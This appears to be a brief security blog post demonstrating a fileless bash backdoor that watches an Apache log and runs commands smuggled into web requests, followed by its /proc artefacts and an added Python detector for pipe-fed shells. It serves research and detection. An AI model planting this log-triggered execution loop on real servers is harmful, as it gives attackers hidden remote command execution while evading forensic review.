2022-09-19 00:00:00

By Tim Brown

Had some fun today, playing with ideas for fileless malware in bash. The general premise of this idea is that we can start a background process that sits, monitors an existing log file and then executes code based on what appears in the logs. For example, consider the following:

$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash

Now, what happens if we make a request to the corresponding web server:

$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'
As far as forensic artefacts, there's not much to go on:

$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'
$ ps -aef
...
root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
root 11125 10680 17 21:27 pts/1 00:00:02 bash
...
$ ls /proc/11125/fd
total 0
dr-x------ 2 root root 0 Jun 28 21:27 .
dr-xr-xr-x 9 root root 0 Jun 28 21:27 ..
lr-x------ 1 root root 64 Jun 28 21:28 0 -> pipe:[290558013]
lrwx------ 1 root root 64 Jun 28 21:28 1 -> /dev/pts/1
lrwx------ 1 root root 64 Jun 28 21:27 2 -> /dev/pts/1
$ cat /proc/11125/cmdline
bash
$ cat /proc/11125/cwd
/root
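The artefacts above are also what a defender has to hunt on: a process whose argv is a bare shell name with no script path, whose stdin is an anonymous pipe, and which keeps running (and burning CPU) long after any installer would have finished. The following is an added example, not the author's code: it reads /proc for that shape and, so that it runs offline, is exercised against a constructed snapshot that mirrors the ps/ls output in the post.

```python
import os
import re
from typing import NamedTuple, Optional

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
PIPE_RE = re.compile(r"^pipe:\[\d+\]$")


class Proc(NamedTuple):
    pid: int
    cmdline: list          # argv split from /proc/<pid>/cmdline
    fd0: Optional[str]     # link target of /proc/<pid>/fd/0


def is_piped_shell(p: Proc) -> bool:
    """Bare shell (no script path, no -c) whose stdin is an anonymous pipe."""
    if len(p.cmdline) != 1:
        return False
    name = os.path.basename(p.cmdline[0].lstrip("-"))  # '-bash' is a login shell
    return name in SHELLS and bool(p.fd0 and PIPE_RE.match(p.fd0))


def find_piped_shells(procs) -> list:
    """PIDs worth a closer look; the '| exec bash' loop in the post looks exactly like this."""
    return [p.pid for p in procs if is_piped_shell(p)]


def snapshot_proc() -> list:
    """Read the live /proc (Linux). Processes that vanish mid-read are skipped."""
    out = []
    for entry in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{entry}"
        try:
            with open(f"{base}/cmdline", "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            fd0 = os.readlink(f"{base}/fd/0")   # closed stdin cannot be our pattern; skip
        except OSError:
            continue
        out.append(Proc(int(entry), argv, fd0))
    return out


# Constructed snapshot mirroring the post: 10680 is the interactive shell,
# 11125 the bare 'bash' fed from a pipe, 11200 an ordinary script for contrast.
SAMPLE = [
    Proc(10680, ["/bin/bash"], "/dev/pts/1"),
    Proc(11125, ["bash"], "pipe:[290558013]"),
    Proc(11200, ["bash", "/usr/local/bin/backup.sh"], "/dev/pts/1"),
]

if __name__ == "__main__":
    print("shells fed from a pipe:", find_piped_shells(snapshot_proc()))
```

A `curl ... | bash` installer produces the same picture for a few seconds, so treat a hit as a lead and check its age and CPU time (`ps -o etimes,time`) before raising it.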
Things like exec/disown/patterns/eval add some fun options for further obfuscation...

Note that the examples given here are somewhat nobbled. Just in case anyone is confused, the point is the "| exec bash" rather than the payload specifics.

Mood: Red

Music: Nothing playing right now
